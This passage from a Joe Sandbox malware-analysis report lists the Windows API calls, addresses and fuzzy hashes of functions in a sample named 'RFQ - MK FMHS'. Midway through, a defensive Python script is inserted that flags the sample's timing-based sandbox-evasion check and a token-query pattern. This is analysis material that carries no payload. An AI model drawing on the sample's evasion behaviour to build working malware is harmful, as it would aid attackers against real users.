                    • Opcode Fuzzy Hash: 7286830d3b3a641c6807e974347c69c8fa803005a142dc1b959539ba6e3b794a
                    • Instruction Fuzzy Hash: DD31BC7160025DEFDB14CF68DB48BAE7BA6EB44315F10422DF924E62D0CBB19914CB91
                    APIs
                    • IsWindowVisible.USER32(?), ref: 00ECB6C7
                    • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00ECB6E4
                    • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00ECB71C
                    • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00ECB742
                    • _wcsstr.LIBCMT ref: 00ECB74C
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                    • String ID:
                    • API String ID: 3902887630-0
                    • Opcode ID: b47b110b520170e918d17e56f2ca861d32c1709a89b2807f1267dd0e5a77c58d
                    • Instruction ID: 4feb311ad456050645c5766631b345b40afad219e6bebd605d11933a819c868f
                    • Opcode Fuzzy Hash: b47b110b520170e918d17e56f2ca861d32c1709a89b2807f1267dd0e5a77c58d
                    • Instruction Fuzzy Hash: 07210732204204BAEB255B79DD4AF7B7BACDF85750F00516EFC05EA1A1EF62CC41D6A0
                    APIs
                      • Part of subcall function 00E72612: GetWindowLongW.USER32(?,000000EB), ref: 00E72623
                    • GetWindowLongW.USER32(?,000000F0), ref: 00EFB44C
                    • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 00EFB471
                    • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00EFB489
                    • GetSystemMetrics.USER32(00000004), ref: 00EFB4B2
                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00EE1184,00000000), ref: 00EFB4D0
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: Window$Long$MetricsSystem
                    • String ID:
                    • API String ID: 2294984445-0
                    • Opcode ID: ae874e243061dbe0c59642a66ad738ff2bc362162d233a878630d6bb4beb5585
                    • Instruction ID: 581e0dc0ce17a22a051f233e8d215417ffffcf311e639d38b0a81de86d1bed5e
                    • Opcode Fuzzy Hash: ae874e243061dbe0c59642a66ad738ff2bc362162d233a878630d6bb4beb5585
                    • Instruction Fuzzy Hash: 23218071910219AFCB208F39CD04A7A37A5EF09725F149728FA36E61E1F7309810DB80
                    APIs
                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00EC9802
                      • Part of subcall function 00E77D2C: _memmove.LIBCMT ref: 00E77D66
                    • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00EC9834
                    • __itow.LIBCMT ref: 00EC984C
                    • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00EC9874
                    • __itow.LIBCMT ref: 00EC9885
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: MessageSend$__itow$_memmove
                    • String ID:
                    • API String ID: 2983881199-0
                    • Opcode ID: 751249cbe77ca97f3bc7a3caa07e7d75519597d20ad792422fa5d01df4f1fe62
                    • Instruction ID: bfff67bce479448297f3d264bde16ef5b4390b24e7004284bdf71ae30fcdf77d
                    • Opcode Fuzzy Hash: 751249cbe77ca97f3bc7a3caa07e7d75519597d20ad792422fa5d01df4f1fe62
                    • Instruction Fuzzy Hash: D921D632700204ABDB149A619D8AFEE3BE8EF4A714F046029F904FB242DA718D46C7D1
                    APIs
                    • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00E7134D
                    • SelectObject.GDI32(?,00000000), ref: 00E7135C
                    • BeginPath.GDI32(?), ref: 00E71373
                    • SelectObject.GDI32(?,00000000), ref: 00E7139C
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: ObjectSelect$BeginCreatePath
                    • String ID:
                    • API String ID: 3225163088-0
                    • Opcode ID: 8ba815a5b194f42e08b85cdf206bca239699764fd14a52cb9c746c9a139bc091
                    • Instruction ID: ff6a280ad29b6520507bb42e9f6be264f50622efb16aacf5f269158096583a37
                    • Opcode Fuzzy Hash: 8ba815a5b194f42e08b85cdf206bca239699764fd14a52cb9c746c9a139bc091
                    • Instruction Fuzzy Hash: E7212870800308FFDB119F29DC04BAD7BAAEF08325F15C266F918A61A1D7719995EBA0
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: _memcmp
                    • String ID:
                    • API String ID: 2931989736-0
                    • Opcode ID: 10c1a5276cf7888eb0f902725587b521009064e471e83919db50294d31ca25a8
                    • Instruction ID: e1b64bf11ef9c789051ff0ea40b1c002a282dfc80735e9eb47fa8bca2cff6117
                    • Opcode Fuzzy Hash: 10c1a5276cf7888eb0f902725587b521009064e471e83919db50294d31ca25a8
                    • Instruction Fuzzy Hash: ED0121B26052067BE505A6124D45FAF73AC9F11398F185059FE08B7283E752DE1292F1
                    APIs
                    • GetCurrentThreadId.KERNEL32 ref: 00ED4D5C
                    • __beginthreadex.LIBCMT ref: 00ED4D7A
                    • MessageBoxW.USER32(?,?,?,?), ref: 00ED4D8F
                    • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00ED4DA5
                    • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00ED4DAC
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                    • String ID:
                    • API String ID: 3824534824-0
                    • Opcode ID: 594b73dddefc21d77fc4b174188db5aa26e98904076828dc24578b88e405049a
                    • Instruction ID: 87c8b2faa21d99560007b0115bd14da1e9424129caafe016feca5d24dfa9b731
                    • Opcode Fuzzy Hash: 594b73dddefc21d77fc4b174188db5aa26e98904076828dc24578b88e405049a
                    • Instruction Fuzzy Hash: 0F1108B2904208BFCB019BA89C08EEB7FADEB99324F144266FD14E3391D671CD05C7A0
                    APIs
                    • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00EC8766
                    • GetLastError.KERNEL32(?,00EC822A,?,?,?), ref: 00EC8770
                    • GetProcessHeap.KERNEL32(00000008,?,?,00EC822A,?,?,?), ref: 00EC877F
                    • HeapAlloc.KERNEL32(00000000,?,00EC822A,?,?,?), ref: 00EC8786
                    • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00EC879D
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                    • String ID:
                    • API String ID: 842720411-0
                    • Opcode ID: 4803301a0849488dee631f9ed521e659a7974c24b59d806d8dd96807b4e62206
                    • Instruction ID: d6abcb45edd9aca1c3856f0e48b1fed21449eb52124d193ee5cece57c4f3ded9
                    • Opcode Fuzzy Hash: 4803301a0849488dee631f9ed521e659a7974c24b59d806d8dd96807b4e62206
                    • Instruction Fuzzy Hash: 5C016271601204FFDB104FA6DE88DB77B6CFF853557201439F949E2260DA328C15CA60
                    APIs
                    • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00ED5502
                    • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00ED5510
                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00ED5518
                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00ED5522
                    • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00ED555E
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: PerformanceQuery$CounterSleep$Frequency
                    • String ID:
                    • API String ID: 2833360925-0
                    • Opcode ID: 740d1ff27eb8d7cfcffcb961cb4e886cc3d0fb47cbde87747d77dceac7cbb424
                    • Instruction ID: 5cc83cfb56d5228166632cf500b74e3891ad878137192519c90ceeb43f5bed19
                    • Opcode Fuzzy Hash: 740d1ff27eb8d7cfcffcb961cb4e886cc3d0fb47cbde87747d77dceac7cbb424
                    • Instruction Fuzzy Hash: 63015732D01A29DBCF00EFE9E888AEDBB79FF49701F410066E901B2241DB309655C7A1
                    APIs
                    • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00EC758C,80070057,?,?,?,00EC799D), ref: 00EC766F
                    • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00EC758C,80070057,?,?), ref: 00EC768A
                    • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00EC758C,80070057,?,?), ref: 00EC7698
                    • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00EC758C,80070057,?), ref: 00EC76A8
                    • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00EC758C,80070057,?,?), ref: 00EC76B4
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: From$Prog$FreeStringTasklstrcmpi
                    • String ID:
                    • API String ID: 3897988419-0
                    • Opcode ID: 38efce7ae823c843a0f6347018bde03fcb599d4793165def6d65150bbf9c0153
                    • Instruction ID: 380c33b811b4c9fd01fa2130c3476aab4f9d8ac612a057e8a08db7338cf51d65
                    • Opcode Fuzzy Hash: 38efce7ae823c843a0f6347018bde03fcb599d4793165def6d65150bbf9c0153
                    • Instruction Fuzzy Hash: 4701B1B2601604AFDB104F19DD44FAA7FACEF84795F100028FD44E2211EB32DD01DBA0
                    APIs
                    • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00EC8608
                    • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00EC8612
                    • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00EC8621
                    • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00EC8628
                    • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00EC863E
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: HeapInformationToken$AllocErrorLastProcess
                    • String ID:
                    • API String ID: 44706859-0
                    • Opcode ID: 4d77caf60dfde2a5223c1d871fe6b3e54cbedcee97390adb2c3401cd55c1e588
                    • Instruction ID: df947a78985c2151f85928ef0c02e90d1006f064ff6fda4e55e7850fe31d1aad
                    • Opcode Fuzzy Hash: 4d77caf60dfde2a5223c1d871fe6b3e54cbedcee97390adb2c3401cd55c1e588
                    • Instruction Fuzzy Hash: 23F04F31201204BFEB104FA6DE89F7B3BACEFC9758B405429F945E6250CB61DC46DA60
                    APIs
                    • GetTokenInformation.ADVAPI32(?,00000003(TokenPrivileges),?,00000000,?), ref: 00EC8669
                    • GetLastError.KERNEL32(?,00000003,?,00000000,?), ref: 00EC8673
                    • GetProcessHeap.KERNEL32(00000008,?,?,00000003,?,00000000,?), ref: 00EC8682
                    • HeapAlloc.KERNEL32(00000000,?,00000003,?,00000000,?), ref: 00EC8689
                    • GetTokenInformation.ADVAPI32(?,00000003(TokenPrivileges),00000000,?,?,?,00000003,?,00000000,?), ref: 00EC869F
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: HeapInformationToken$AllocErrorLastProcess
                    • String ID:
                    • API String ID: 44706859-0
                    • Opcode ID: 8a73d73e4b41dc43827d74ad2e67d5b0c889d8f9cbe6d31b8211bf6205b71494
                    • Instruction ID: 8f5567f4aea2ba4100f008905095298470561458db123dd6d953b4c6ea44dcdf
                    • Opcode Fuzzy Hash: 8a73d73e4b41dc43827d74ad2e67d5b0c889d8f9cbe6d31b8211bf6205b71494
                    • Instruction Fuzzy Hash: 15F04F71201204AFEB111FA6EE88FB73BACEF89B58B100039F945E6150CF61D955DA60
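The two routines above are the kind of API sequence an analyst wants pulled out of a listing like this automatically: the QueryPerformanceCounter / Sleep / QueryPerformanceCounter function at 00ED5502 is the execution-timing check listed among this sample's signatures, and the GetTokenInformation function at 00EC8669 (like the GetUserObjectSecurity function at 00EC8766) is the size-probe pattern, where a first call with a zero-length buffer learns the required size, GetLastError and HeapAlloc follow, and a second call fills the buffer. The Python below is an added example, not Joe Sandbox code and not code from the sample. It parses API lines in the form rendered on this page (bullet, Api.MODULE(args), ref: address, with the optional "Part of subcall function" prefix and nested parentheses in arguments), flags the timing check, and flags the size-probe pattern generically for any API rather than only the two on this page. It also decodes the GetTokenInformation class from the numeric argument: in winnt.h, TOKEN_INFORMATION_CLASS value 3 is TokenPrivileges and TokenIntegrityLevel is 25, so the number is what to trust, not a label printed beside it. The sample lines are constructed from the listing; the regex, rule names and the class table are this example's own.

```python
"""Triage Joe Sandbox 'APIs' listings (added example; not Joe Sandbox or sample code)."""
import re
from collections import namedtuple
from typing import List, Optional

# One "• Api.MODULE(args), ref: ADDR" line, with an optional "Part of subcall
# function XXXXXXXX:" prefix. Arguments can nest parentheses, e.g.
# "00000003(TokenPrivileges)", so the greedy args group runs to the last ')'.
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<caller>[0-9A-F]{8}):\s*)?"
    r"(?P<api>[A-Za-z_][\w@:]*)\.(?P<module>[A-Z0-9]+)"
    r"(?:\((?P<args>.*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$")

# Subset of TOKEN_INFORMATION_CLASS from winnt.h. Decode the number; never
# trust a label printed beside it (3 is TokenPrivileges, TokenIntegrityLevel is 25).
TOKEN_INFORMATION_CLASS = {1: "TokenUser", 2: "TokenGroups", 3: "TokenPrivileges",
                           4: "TokenOwner", 8: "TokenType", 18: "TokenElevationType",
                           20: "TokenElevation", 25: "TokenIntegrityLevel"}

Call = namedtuple("Call", "api module args ref caller")


def split_args(raw: str) -> List[str]:
    """Split on top-level commas only, keeping '00000003(TokenPrivileges)' whole."""
    out, cur, depth = [], [], 0
    for ch in raw:
        depth += (ch == "(") - (ch == ")")
        if ch == "," and depth == 0:
            out.append("".join(cur))
            cur = []
        else:
            cur.append(ch)
    return out + ["".join(cur)] if raw else []


def arg_value(arg: str) -> Optional[int]:
    """Hex value of one printed argument, or None for '?' (unresolved) or a bare label."""
    token = arg.strip().split("(", 1)[0]
    try:
        return int(token, 16)
    except ValueError:
        return None


def parse_listing(text: str) -> List[Call]:
    """Parse the API lines of one function's listing; any other line is ignored."""
    calls = []
    for m in filter(None, map(API_LINE.match, text.splitlines())):
        calls.append(Call(m["api"], m["module"], split_args(m["args"] or ""),
                          m["ref"], m["caller"]))
    return calls


def find_timing_checks(calls: List[Call]):
    """QueryPerformanceCounter ... Sleep ... QueryPerformanceCounter in one function:
    'did the expected wall-clock time really pass', a debugger/sandbox check."""
    hits = []
    for i, c in enumerate(calls):
        if c.api != "QueryPerformanceCounter":
            continue
        for j in range(i + 1, len(calls)):
            if calls[j].api == "QueryPerformanceCounter":
                if any(k.api == "Sleep" for k in calls[i + 1:j]):
                    hits.append((c.ref, calls[j].ref))
                break
    return hits


def find_size_probes(calls: List[Call]):
    """X(...) -> GetLastError -> HeapAlloc -> X(...): probe the required size,
    allocate, call again. Generic over X, so GetTokenInformation and
    GetUserObjectSecurity are caught by the same rule."""
    hits = []
    for i, first in enumerate(calls):
        for j in range(i + 1, len(calls)):
            if calls[j].api != first.api:
                continue
            between = {c.api for c in calls[i + 1:j]}
            if {"GetLastError", "HeapAlloc"} <= between:
                hits.append((first.api, first.ref, calls[j].ref))
            break
    return hits


def token_classes_queried(calls: List[Call]):
    """ref -> TOKEN_INFORMATION_CLASS name for each GetTokenInformation call,
    decoded from the numeric second argument."""
    out = {}
    for c in calls:
        if c.api == "GetTokenInformation" and len(c.args) > 1:
            v = arg_value(c.args[1])
            if v is not None:
                out[c.ref] = TOKEN_INFORMATION_CLASS.get(v, f"class {v}")
    return out


# Constructed samples: the API lines of two functions on this page.
SAMPLE_TIMING = """\
• QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00ED5502
• QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00ED5510
• Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00ED5518
• QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00ED5522
• Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00ED555E
"""
SAMPLE_TOKEN = """\
• GetTokenInformation.ADVAPI32(?,00000003(TokenPrivileges),?,00000000,?), ref: 00EC8669
• GetLastError.KERNEL32(?,00000003,?,00000000,?), ref: 00EC8673
• GetProcessHeap.KERNEL32(00000008,?,?,00000003,?,00000000,?), ref: 00EC8682
• HeapAlloc.KERNEL32(00000000,?,00000003,?,00000000,?), ref: 00EC8689
• GetTokenInformation.ADVAPI32(?,00000003(TokenPrivileges),00000000,?,?,?,00000003,?,00000000,?), ref: 00EC869F
"""
```

Feed parse_listing one function's APIs block at a time; both rules are order-sensitive within a function, and the ref addresses are what you use to join findings back to the disassembly or to the "Part of subcall function" callers.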
                    APIs
                    • GetDlgItem.USER32(?,000003E9), ref: 00ECC6BA
                    • GetWindowTextW.USER32(00000000,?,00000100), ref: 00ECC6D1
                    • MessageBeep.USER32(00000000), ref: 00ECC6E9
                    • KillTimer.USER32(?,0000040A), ref: 00ECC705
                    • EndDialog.USER32(?,00000001), ref: 00ECC71F
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: BeepDialogItemKillMessageTextTimerWindow
                    • String ID:
                    • API String ID: 3741023627-0
                    • Opcode ID: f98e7e7c6fff17bfcab81abfdd3116a7122959ccf5345c69b8e8c9de76b089ea
                    • Instruction ID: a166cff5629ee4229cb33987c02a8029b7babb888e5a422ed8a93a65bfe15125
                    • Opcode Fuzzy Hash: f98e7e7c6fff17bfcab81abfdd3116a7122959ccf5345c69b8e8c9de76b089ea
                    • Instruction Fuzzy Hash: 40014F30500704ABEB215B21DE4EFA677B8FF44B05F10166EF586F14E1DBE1A959CA80
                    APIs
                    • EndPath.GDI32(?), ref: 00E713BF
                    • StrokeAndFillPath.GDI32(?,?,00EABAD8,00000000,?), ref: 00E713DB
                    • SelectObject.GDI32(?,00000000), ref: 00E713EE
                    • DeleteObject.GDI32 ref: 00E71401
                    • StrokePath.GDI32(?), ref: 00E7141C
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: Path$ObjectStroke$DeleteFillSelect
                    • String ID:
                    • API String ID: 2625713937-0
                    • Opcode ID: 7946ce3ba0f5eac1d9d28cc25abfe019410ee3c06b241214fdf5b7ec3a80ded1
                    • Instruction ID: 4a05214394a8c87ce34a678e13b17ce685fb38629a5fe180356dce0a3add5977
                    • Opcode Fuzzy Hash: 7946ce3ba0f5eac1d9d28cc25abfe019410ee3c06b241214fdf5b7ec3a80ded1
                    • Instruction Fuzzy Hash: 72F0B230004308BFDB115F2AEC48B683BA6AF4533AF04D265E569A50B1DB318999EF60
                    APIs
                    • CoInitialize.OLE32(00000000), ref: 00EDC69D
                    • CoCreateInstance.OLE32(00F02D6C,00000000,00000001,00F02BDC,?), ref: 00EDC6B5
                      • Part of subcall function 00E77F41: _memmove.LIBCMT ref: 00E77F82
                    • CoUninitialize.OLE32 ref: 00EDC922
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: CreateInitializeInstanceUninitialize_memmove
                    • String ID: .lnk
                    • API String ID: 2683427295-24824748
                    • Opcode ID: 3d4a08cb73d1c808b6f4848c97be80e3a59cf41874d8a67346bcc55c855f3bf5
